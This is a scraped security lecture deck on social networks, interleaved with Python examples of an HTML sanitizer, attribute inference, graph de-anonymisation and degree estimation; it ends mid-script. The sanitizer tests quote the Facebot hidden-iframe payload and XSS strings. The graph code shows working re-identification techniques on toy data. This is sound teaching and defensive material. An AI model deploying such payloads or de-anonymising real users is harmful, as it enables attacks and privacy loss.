“Facebot” - Elias Athanasopoulos, A. Makridakis, D. Antoniades S. Antonatos, Sotiris Ioannidis, K. G. Anagnostakis and Evangelos P. Markatos. “Antisocial Networks: Turning a Social Network into a Botnet,” 2008.
![Page 51: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/51.jpg)
Common Trends
Social channels increase susceptibility to scams
− Personal information also aids greatly in targeted attacks
Fundamental issue: SNS environment leads to carelessness
− Rapid, erratic browsing
− Applications installed with little scrutiny
− Fun, noisy, unpredictable environment
− People use SNS with their brain turned off
![Page 52: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/52.jpg)
Common Trends
• Centralisation helps in prevention
− Complete control of messaging platform, blocking, revocation
• Social Context also useful
− Can develop strong IDS
![Page 53: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/53.jpg)
Web Hacking
Most SNS have a poor security track record
− Rapid growth
− Complicated site design
− Many feature interactions
Lack of attention to security
− Over half of sites failing even to deploy TLS properly!
![Page 54: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/54.jpg)
FBML Translation
Facebook Markup Language
Result: arbitrary JavaScript execution (Felt, 2007)
Translated into HTML:
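The Facebot iframe payload shown under "SNS-hosted botnet" and the FBML-to-HTML translation flaw on this slide fail at the same step: application-supplied markup reaches the user's page without being rebuilt from an allowlist. The following is an added example, not from the slides or from Facebook's FBML translator, of an allowlist translator in Python using the standard library's `html.parser`. The tag and attribute allowlists, and the rule that `src`/`href` may only point at the operator's own hosts (which removes the off-site fetch the Facebot payload depends on), are constructed for the example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"b", "i", "p", "br", "a", "img"}              # constructed allowlist
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
# HTML elements that never have a closing tag; needed so a disallowed <input> does
# not swallow everything after it.
HTML_VOID = VOID_TAGS | {"input", "hr", "meta", "link", "embed", "source", "area",
                         "base", "col", "param", "track", "wbr"}
RESOURCE_DOMAINS = {"facebook.com"}   # hypothetical: where links and images may point


def safe_url(value):
    parts = urlsplit(value or "")
    if parts.scheme.lower() not in {"http", "https"}:
        return False
    host = (parts.hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in RESOURCE_DOMAINS)


class AllowlistSanitizer(HTMLParser):
    """Rebuilds markup from an allowlist; everything else is dropped and recorded."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self._open = [], [], []
        self._skip = 0   # >0 while inside a disallowed container such as <script> or <iframe>

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            if tag not in HTML_VOID:
                self._skip += 1            # swallow its content as well
            return
        if self._skip:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")          # e.g. onclick, style
            elif name in ("href", "src") and not safe_url(value):
                self.dropped.append(f"{tag}@{name}={value}")
            else:
                kept.append(f' {name}="{escape(value or "")}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if tag not in ALLOWED_TAGS:
            if tag not in HTML_VOID and self._skip:
                self._skip -= 1
            return
        if self._skip or tag in VOID_TAGS or tag not in self._open:
            return
        while self._open:                  # close anything still open inside it, then itself
            top = self._open.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data))

    def result(self):
        while self._open:                  # never emit unbalanced output
            self.out.append(f"</{self._open.pop()}>")
        return "".join(self.out)


def sanitize(markup):
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return parser.result(), parser.dropped


# The Facebot payload from the "SNS-hosted botnet" slide.
FACEBOT_IFRAME = ('<iframe name="1" style="border: 0px none #ffffff; width: 0px; height: 0px;"'
                  ' src="http://victim-host/image1.jpg">\n</iframe><br/>')

if __name__ == "__main__":
    print(sanitize(FACEBOT_IFRAME))
    print(sanitize('<b>Hi</b><script>alert(1)</script><a href="javascript:alert(1)" onclick="x()">x</a>'))
```

The design point is that the translator rebuilds output rather than filtering input: unknown tags, unknown attributes and non-allowlisted URL targets cannot pass through because nothing is copied verbatim, and the `dropped` list gives the application platform a per-app record of what was stripped, which is itself a useful abuse signal.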
![Page 55: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/55.jpg)
Facebook Query Language
Facebook Query Language Exploits (Bonneau, Anderson, Danezis, 2009)
![Page 56: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/56.jpg)
Hack #3: Facebook XSRF/Automatic Authentication
Credit: Ronan Zilberman
![Page 57: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/57.jpg)
Overview
I. The Social Network Ecosystem
II. Security
III. Privacy
![Page 58: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/58.jpg)
Data of Interest
![Page 59: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/59.jpg)
Data of Interest
Profile Data
− Loads of PII (contact info, address, DOB)
− Tastes, preferences
Graph Data
− Friendship connections
− Common group membership
− Communication patterns
Activity Data
− Time, frequency of log-in, typical behavior
![Page 60: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/60.jpg)
Interested Parties
Data Aggregation
− Marketers, Insurers, Credit Ratings Agencies, Intelligence, etc.
− SNS operator implicitly included
− Often, graph information is more important than profiles
Targeted Data Leaks
− Employers, Universities, Fraudsters, Local Police, Friends, etc.
− Usually care about profile data and photos
![Page 61: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/61.jpg)
Major Privacy Problems
Data is shared in ways that most users don't expect
“Contextual integrity” not maintained
Three main drivers:
− Poor implementation
− Misaligned incentives & economic pressure
− Indirect information leakage
![Page 62: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/62.jpg)
Poor Implementation
![Page 63: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/63.jpg)
Poor Implementation
Orkut Photo Tagging
![Page 64: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/64.jpg)
Poor Implementation
Facebook Connect
![Page 65: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/65.jpg)
Poor Implementation
− Applications given full access to profile data of installed users
− Even less revenue available for application developers...
![Page 66: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/66.jpg)
Poor Implementation
Better architectures proposed
− Privacy by proxy
− Privacy by sandboxing
![Page 67: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/67.jpg)
Economic Pressure
Most SNSs still lose money
− Advertising business model yet to prove its viability
Grow first, monetize later
− “Growth is primary, revenue is secondary” - Mark Zuckerberg
Privacy is often an impediment to new features
![Page 68: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/68.jpg)
Economic Pressure
Major survey of 45 social networks' privacy practices
Key Conclusions:
− “Market for privacy” fundamentally broken
− Huge network effects, lock-in, lemons market
− Sites with better privacy less likely to mention it!
![Page 69: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/69.jpg)
Promotional Techniques
![Page 70: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/70.jpg)
Promotional Techniques
![Page 71: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/71.jpg)
Terms of Service
Most Terms of Service reserve broad rights to user data
Terms of Service, hi5:
![Page 72: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/72.jpg)
Information leaked by the Social Graph...
![Page 73: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/73.jpg)
“Traditional” Social Network Analysis
• Performed by sociologists, anthropologists, etc. since the 70's
• Use data carefully collected through interviews & observation
• Typically < 100 nodes
• Complete knowledge
• Links have consistent meaning
• All of these assumptions fail badly for online social network data
![Page 74: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/74.jpg)
Traditional Graph Theory
• Nice Proofs
• Tons of definitions
• Ignored topics:
• Large graphs
• Sampling
• Uncertainty
![Page 75: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/75.jpg)
Models Of Complex Networks From Math & Physics
Many nice models
• Erdos-Renyi
• Watts-Strogatz
• Barabasi-Albert
Social Networks properties:
• Power-law
• Small-world
• High clustering coefficient
![Page 76: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/76.jpg)
Real social graphs are complicated!
![Page 77: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/77.jpg)
When In Doubt, Compute!
We do know many graph algorithms:
• Find important nodes
• Identify communities
• Train classifiers
• Identify anomalous connections
Major Privacy Implications!
Page 78
Privacy Questions
• What can we infer purely from link structure?
Page 79
Privacy Questions
• What can we infer purely from link structure?
A surprising amount!
• Popularity
• Centrality
• Introvert vs. Extrovert
• Leadership potential
• Communities
Page 80
Privacy Questions
• If we know nothing about a node but its neighbours, what can we infer?
Page 81
Privacy Questions
• If we know nothing about a node but its neighbours, what can we infer?
A lot!
• Gender
• Political Beliefs
• Location
• Breed?
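The inference the slide alludes to (gender, politics, location from friends alone) is, at its simplest, a majority vote over the neighbours who disclose the attribute. The script below is an added example, not code from the talk: it runs that vote on a constructed toy network (made-up names and cities) and, from the site operator's side, measures with a leave-one-out check how predictable a hidden field is while friends keep disclosing theirs.

```python
from collections import Counter

# Constructed toy network (made-up names and attributes, not real data):
# two friend clusters, with the 'city' field disclosed by some users only.
EDGES = [
    ("alice", "bob"), ("alice", "carol"), ("alice", "dave"),
    ("bob", "carol"), ("bob", "dave"), ("carol", "dave"),
    ("dave", "erin"), ("erin", "frank"), ("erin", "grace"),
    ("frank", "grace"), ("frank", "heidi"), ("grace", "heidi"),
]
KNOWN_CITY = {
    "bob": "Cambridge", "carol": "Cambridge", "dave": "Cambridge",
    "erin": "London", "frank": "London", "grace": "London",
}


def adjacency(edges):
    """Undirected adjacency sets from an edge list."""
    adj = {}
    for u, v in edges:
        adj.setdefault(u, set()).add(v)
        adj.setdefault(v, set()).add(u)
    return adj


ADJ = adjacency(EDGES)


def infer_from_neighbours(adj, known, node):
    """Guess a hidden attribute by majority vote among the neighbours that
    disclose it.  Returns (guess, confidence); confidence is the share of
    voting neighbours that agree.  (None, 0.0) when no neighbour discloses."""
    votes = Counter(known[n] for n in sorted(adj.get(node, ())) if n in known)
    if not votes:
        return None, 0.0
    value, count = votes.most_common(1)[0]
    return value, count / sum(votes.values())


def infer_all_hidden(adj, known):
    """The inference an outsider could run on every user who hid the field."""
    return {n: infer_from_neighbours(adj, known, n)
            for n in sorted(adj) if n not in known}


def leave_one_out_accuracy(adj, known):
    """Operator-side check: for each user who disclosed the field, hide it and
    see whether the neighbour vote recovers it.  High accuracy means the
    privacy setting on that field buys little while friends keep disclosing."""
    hits = total = 0
    for n, truth in known.items():
        others = {m: v for m, v in known.items() if m != n}
        guess, _ = infer_from_neighbours(adj, others, n)
        if guess is not None:
            total += 1
            hits += guess == truth
    return hits / total if total else 0.0


if __name__ == "__main__":
    for user, (guess, conf) in infer_all_hidden(ADJ, KNOWN_CITY).items():
        print(f"{user}: hidden city guessed as {guess} (confidence {conf:.2f})")
    print(f"leave-one-out accuracy: {leave_one_out_accuracy(ADJ, KNOWN_CITY):.2f}")
```

On this toy graph both users who hid their city are guessed correctly with full confidence, and the leave-one-out check recovers every disclosed value; the interesting number on real data is that accuracy figure, which tells an operator how much protection a per-user privacy setting actually provides.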
Page 82
Privacy Questions
• Can we anonymise graphs?
Page 83
Privacy Questions
• Can we anonymise graphs?
Not easily...
• Seminal result by Backstrom et al.: Active attack needs just 7 nodes
• Can do even better given user's complete neighborhood
• Also results for correlating users across networks
• Developing line of research...
Page 84
De-anonymisation (active)
(Figure: a social graph with nodes A to I)
A Social Graph with Private Links
Page 85
De-anonymisation (active)
(Figure: the same graph with attacker nodes 1 to 5 added and random edges among them)
Attacker adds k nodes with random edges
Page 86
De-anonymisation (active)
(Figure: attacker nodes now also linked to the targeted nodes G and H)
Attacker links to targeted nodes
Page 87
De-anonymisation (active)
Graph is anonymised and edges are released
Page 88
De-anonymisation (active)
(Figure: the released graph with labels removed; the attacker looks for its own nodes 1 to 5)
Attacker searches for unique k-subgroup
Page 89
De-anonymisation (active)
(Figure: attacker nodes 1 to 5 located; their neighbours G and H are identified and the edge between them is visible)
Link between targeted nodes is confirmed
Page 90
De-anonymisation (passive)
• Similar to above, except k normal users collude and share their links
• Only compromise random targets
Page 91
De-anonymisation results
• 7 nodes need to be created in active attack
• De-anonymize 70 chosen nodes!
• 7 nodes in passive coalition compromise ~ 10 random nodes
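The slides above walk through the active attack step by step; the simulation below is an added example (my code, not from the talk or from the Backstrom et al. paper it cites). It uses a constructed graph whose labels mirror the slide's A to I, with four fake accounts X1 to X4 standing in for the slide's k nodes, and the targets G and H each accepting a distinct subset of the fakes. Read from the data owner's side, it is the test to run before publishing a "relabelled" edge list: if a small planted subgraph can still be located uniquely by structure alone, the relabelling has not anonymised anything.

```python
import random

# Constructed toy social graph (labels mirror the slide's A..I; not real data).
BASE_EDGES = [("A", "B"), ("A", "C"), ("B", "C"), ("B", "D"), ("C", "F"),
              ("D", "E"), ("D", "G"), ("E", "I"), ("F", "G"), ("G", "H"), ("H", "I")]
# The attacker's k=4 fake accounts, the edges among them, and which fakes each
# target accepted as a friend.  The edge G-H is the private link at stake.
FAKE_EDGES = [("X1", "X2"), ("X2", "X3"), ("X1", "X4")]
TARGET_LINKS = {"G": {"X1", "X2"}, "H": {"X2", "X3"}}


def graph_from_edges(edges):
    """Undirected adjacency sets from an edge list."""
    adj = {}
    for u, v in edges:
        adj.setdefault(u, set()).add(v)
        adj.setdefault(v, set()).add(u)
    return adj


def anonymise(adj, seed=1):
    """Naive release: random pseudonyms for the nodes, every edge kept."""
    rng = random.Random(seed)
    names = sorted(adj)
    pseudonyms = [f"n{i}" for i in range(len(names))]
    rng.shuffle(pseudonyms)
    m = dict(zip(names, pseudonyms))
    return {m[u]: {m[v] for v in nb} for u, nb in adj.items()}, m


def find_placements(released, fake_adj, fake_degree):
    """Every injective placement of the attacker's subgraph in the released
    graph: node degrees must match exactly, and edges among the placed fakes
    must match the attacker's own edge pattern exactly (backtracking search)."""
    order = sorted(fake_adj)
    deg = {v: len(nb) for v, nb in released.items()}
    found = []

    def extend(i, placed):
        if i == len(order):
            found.append(dict(placed))
            return
        x = order[i]
        for cand in sorted(released):
            if cand in placed.values() or deg[cand] != fake_degree[x]:
                continue
            if all((placed[y] in released[cand]) == (y in fake_adj[x]) for y in order[:i]):
                placed[x] = cand
                extend(i + 1, placed)
                del placed[x]

    extend(0, {})
    return found


def locate_target(released, placement, accepted):
    """A target is the one non-fake node adjacent to exactly `accepted` among
    the placed fakes; None if that signature is absent or not unique."""
    fakes = set(placement.values())
    wanted = {placement[x] for x in accepted}
    hits = [v for v in sorted(released) if v not in fakes and (released[v] & fakes) == wanted]
    return hits[0] if len(hits) == 1 else None


def simulate(seed=1):
    """Plant the fakes, release the relabelled graph, then recover the G-H link."""
    target_edges = [(t, x) for t, xs in TARGET_LINKS.items() for x in sorted(xs)]
    adj = graph_from_edges(BASE_EDGES + FAKE_EDGES + target_edges)
    fake_adj = graph_from_edges(FAKE_EDGES)
    fake_degree = {x: len(adj[x]) for x in fake_adj}   # the attacker knows its own degrees
    released, _ = anonymise(adj, seed)
    placements = find_placements(released, fake_adj, fake_degree)
    result = {"placements": len(placements), "released": released,
              "placement": placements[0] if len(placements) == 1 else None, "G_H_linked": None}
    if len(placements) != 1:
        return result   # ambiguous: the fakes cannot be told apart from other users
    g = locate_target(released, placements[0], TARGET_LINKS["G"])
    h = locate_target(released, placements[0], TARGET_LINKS["H"])
    if g is not None and h is not None:
        result["G_H_linked"] = h in released[g]
    return result


if __name__ == "__main__":
    r = simulate()
    print(f"placements found: {r['placements']}, G-H link recovered: {r['G_H_linked']}")
```

The search is structure-only, so the pseudonym permutation never matters: on this graph the four fakes have the degree sequence 3, 4, 2, 1 along a path, which no other four nodes reproduce, and the two targets are then the only nodes whose fake-neighbour sets are exactly {X1, X2} and {X2, X3}. The passive variant on the next slide is the same search with the coalition's real accounts in place of the fakes.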
Page 92
Cross-graph De-anonymisation
• Goal: identify users in a private graph by mapping to public graph
• “Shouldn't” work: graph isomorphism is NP-complete
• Works quite well in practice on real graphs!
Page 93
Cross-graph De-anonymisation
(Figure: a Public Graph beside a Private Graph)
Page 94
Cross-graph De-anonymisation
(Figure: nodes A, B, C in the public graph matched to A', B', C' in the private graph)
Step 1: Identify Seed Nodes
Page 95
Cross-graph De-anonymisation
(Figure: D is mapped to D' because its neighbours A, B, C are already mapped to A', B', C')
Step 2: Assign mappings based on mapped neighbors
Page 96
Cross-graph De-anonymisation
(Figure: E is mapped to E' in the next round from its already-mapped neighbours)
Step 3: Iterate
Page 97
Cross-graph De-anonymisation
• Demonstrated on Twitter and Flickr
• Only 24% of Twitter users on Flickr, 5% of Flickr users on Twitter
• 31% of common users identified (~9,000) given just 30 seeds!
• Real-world attacks can be much more powerful
• Auxiliary knowledge
• Mapping of attributes, language use, etc.
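Steps 1 to 3 above are a seed-and-propagate loop. The code below is an added example, not from the talk: two constructed six-node graphs (made-up ids, not the Twitter/Flickr data) with one edge present only on the public side, to model imperfect overlap. The propagation rule is the simplest one that works: a private node takes the unmapped public node that shares the most already-mapped neighbours, provided the score is non-zero and strictly beats the runner-up; ties are left for a later round, which is also what happens when too few seeds are given.

```python
# Constructed example graphs (made-up ids, not the Twitter/Flickr data in the talk).
PUBLIC_EDGES = [("a", "b"), ("a", "c"), ("b", "c"), ("b", "d"),
                ("c", "e"), ("d", "e"), ("d", "f"), ("e", "f")]
# Pseudonymous release of an overlapping network: same people as p1..p6, but
# the edge d-f is absent here, so the two graphs are not isomorphic.
PRIVATE_EDGES = [("p1", "p2"), ("p1", "p3"), ("p2", "p3"), ("p2", "p4"),
                 ("p3", "p5"), ("p4", "p5"), ("p5", "p6")]
GROUND_TRUTH = {f"p{i}": name for i, name in enumerate("abcdef", start=1)}


def graph_from_edges(edges):
    """Undirected adjacency sets from an edge list."""
    adj = {}
    for u, v in edges:
        adj.setdefault(u, set()).add(v)
        adj.setdefault(v, set()).add(u)
    return adj


PUBLIC = graph_from_edges(PUBLIC_EDGES)
PRIVATE = graph_from_edges(PRIVATE_EDGES)


def propagate(public, private, seeds, max_rounds=10):
    """Seed-and-propagate mapping private -> public (Steps 2 and 3).
    Each round, every unmapped private node is scored against the unused
    public nodes by how many of its already-mapped neighbours land in the
    candidate's neighbourhood; it is mapped only if the best score is
    non-zero and strictly ahead of the runner-up."""
    mapping = dict(seeds)                       # Step 1: seeds matched by other means
    for _ in range(max_rounds):
        changed = False
        for v in sorted(private):
            if v in mapping:
                continue
            used = set(mapping.values())
            mapped_nbrs = {mapping[w] for w in private[v] if w in mapping}
            if not mapped_nbrs:
                continue                        # nothing to propagate from yet
            scores = sorted(((len(public[u] & mapped_nbrs), u)
                             for u in public if u not in used), reverse=True)
            if not scores or scores[0][0] == 0:
                continue
            if len(scores) > 1 and scores[1][0] == scores[0][0]:
                continue                        # ambiguous: leave for a later round
            mapping[v] = scores[0][1]
            changed = True
        if not changed:
            break
    return mapping


def accuracy(mapping, truth):
    """Fraction of private nodes mapped to the right public identity."""
    return sum(mapping.get(v) == u for v, u in truth.items()) / len(truth)


if __name__ == "__main__":
    m = propagate(PUBLIC, PRIVATE, {"p1": "a", "p2": "b"})
    print(m, f"accuracy {accuracy(m, GROUND_TRUTH):.2f}")
    print(propagate(PUBLIC, PRIVATE, {"p1": "a"}))   # one seed: every candidate ties
```

With the two seeds the whole private graph is resolved in one round despite the missing edge; with a single seed every candidate for p2 and p3 ties at one shared neighbour, nothing is assigned, and the loop stops. The slide's 31% at 30 seeds reflects the noise, sparse overlap and scale of real data, which this toy does not have.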
Page 98
Privacy Questions
• What can we infer if we “compromise” a fraction of nodes?
Page 99
Privacy Questions
• What can we infer if we “compromise” a fraction of nodes?
A lot...
• Common theme: small groups of nodes can see the rest
• Danezis et al.
• Nagaraja
• Korolova et al.
• Bonneau et al.
Page 100
Privacy Questions
• What if we get a subset of neighbours for all nodes?
Page 101
Privacy Questions
• What if we get a subset of k neighbours for all nodes?
Emerging question for many social graphs
• Facebook and online SNS
• Mobile SNS
Page 102
A Quietly Introduced Feature...
Public Search Listings, Sep 2007
Page 103
Attack Scenario
• Spider all public listings
• Our experiments crawled 250k users daily
• Implies ~800 CPU-days to recover all users
• Use sampled graph to compute functions of original
Page 104
Estimating Degrees
(Figure: the example graph, each node labelled with its true degree: 3, 3, 3, 4, 4, 2, 1, 2, 6)
Average Degree: 3.5
Page 105
Estimating Degrees
(Figure: the same graph with the true degrees; each node now publishes only k of its neighbours)
Sampled with k=2
Page 106
Estimating Degrees
(Figure: every degree label replaced by "?", except the node of degree 1, which published fewer than k neighbours)
Degree known exactly for one node
Page 107
Estimating Degrees
(Figure: naive estimates per node: 3.5, 3.5, 1.75, 3.5, 5.25, 1.75, 1, 1.75, 7)
Naïve approach: Multiply in-degree by average degree / k
Page 108
Estimating Degrees
(Figure: estimates after raising: 3.5, 3.5, 2, 3.5, 5.25, 2, 1, 2, 7)
Raise estimates which are less than k
Page 109
Estimating Degrees
(Figure: same estimates: 3.5, 3.5, 2, 3.5, 5.25, 2, 1, 2, 7)
Nodes with high-degree neighbors underestimated
Page 110
Estimating Degrees
(Figure: estimates 3.5, 3.5, 3.5, 3.5, 5.25, 2, 1, 2, 7)
Iteratively scale by current estimate / k in each step
Page 111
Estimating Degrees
(Figure: estimates 2.75, 2.75, 3.5, 3.63, 5.5, 2, 1, 2, 5.5)
After 1 iteration
Page 112
Estimating Degrees
(Figure: estimates 2.68, 2.68, 3.41, 3.53, 5.35, 2, 1, 2, 5.35)
Normalise to estimated total degree
Page 113
Estimating Degrees
(Figure: estimates 2.48, 2.83, 3.04, 3.64, 5.09, 2, 1, 2, 5.91)
Convergence after n > 10 iterations
Page 114
Estimating Degrees
• Converges fast, typically after 10 iterations
• Absolute error is high: 38% on average
• Reduced to 23% for nodes with d ≥ 50
• Still picks out high-degree nodes accurately
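The estimator of slides 107 to 113, as an added example (my code, not the crawler or estimator from the talk) on a constructed graph: a hub with 40 degree-1 friends and a separate 3-regular "prism" of six users, each user publishing at most k=2 friends. The steps are the slide's: start from in-degree times average degree over k, raise anything below k to k, rescale each listing by the lister's current estimate, normalise to the estimated total. Two assumptions are mine: the estimator is given the true average degree, and a listing from a user who published all of their friends is weighted 1 rather than estimate/k (which is what keeps exactly-known nodes consistent; for users who listed exactly k it is the slide's rule).

```python
import random

K = 2  # each user publishes at most K friends (the "subset of k neighbours" model)


def build_sample_graph(n_leaves=40):
    """Constructed graph (not real data): one hub linked to n_leaves degree-1
    users, plus a separate 3-regular 'prism' of six users c1..c6."""
    adj = {}

    def link(u, v):
        adj.setdefault(u, set()).add(v)
        adj.setdefault(v, set()).add(u)

    for i in range(n_leaves):
        link("hub", f"leaf{i}")
    for a, b in [("c1", "c2"), ("c2", "c3"), ("c3", "c1"),
                 ("c4", "c5"), ("c5", "c6"), ("c6", "c4"),
                 ("c1", "c4"), ("c2", "c5"), ("c3", "c6")]:
        link(a, b)
    return adj


def public_listings(adj, k, seed=7):
    """What a crawler sees: each user's published list, a random subset of at
    most k friends (the whole list if the user has fewer than k)."""
    rng = random.Random(seed)
    return {u: set(rng.sample(sorted(nb), min(k, len(nb)))) for u, nb in adj.items()}


def estimate_degrees(listings, k, avg_degree, iterations=30):
    """Degree estimates from k-limited friend lists.  A user who published
    fewer than k friends has a known degree; everyone else starts from
    in-degree * avg/k (raised to k), then is iteratively re-estimated and
    normalised to the estimated total degree avg * n."""
    nodes = set(listings)
    for lst in listings.values():
        nodes |= lst
    in_lists = {v: [] for v in nodes}
    for u, lst in listings.items():
        for v in lst:
            in_lists[v].append(u)
    exact = {u: len(lst) for u, lst in listings.items() if len(lst) < k}
    free = [v for v in nodes if v not in exact]
    free_total = avg_degree * len(nodes) - sum(exact.values())
    # naive start (slides 107-108): in-degree scaled by avg/k, floored at k
    est = {v: max(k, len(in_lists[v]) * avg_degree / k) for v in free}
    est.update(exact)
    for _ in range(iterations):
        # a listing u -> v stands for est[u]/|L_u| of u's friends: est[u]/k when
        # u listed only k of them, exactly 1 when u listed all of them
        new = {v: sum(est[u] / len(listings[u]) for u in in_lists[v]) for v in free}
        new = {v: max(k, x) for v, x in new.items()}          # raise below-k estimates
        scale = free_total / sum(new.values())                # normalise to total degree
        est.update({v: x * scale for v, x in new.items()})
    return est


def mean_relative_error(est, adj):
    """Average |estimate - degree| / degree over the nodes whose degree was not known."""
    errs = [abs(est[v] - len(nb)) / len(nb) for v, nb in adj.items() if len(nb) >= K]
    return sum(errs) / len(errs)


if __name__ == "__main__":
    adj = build_sample_graph()
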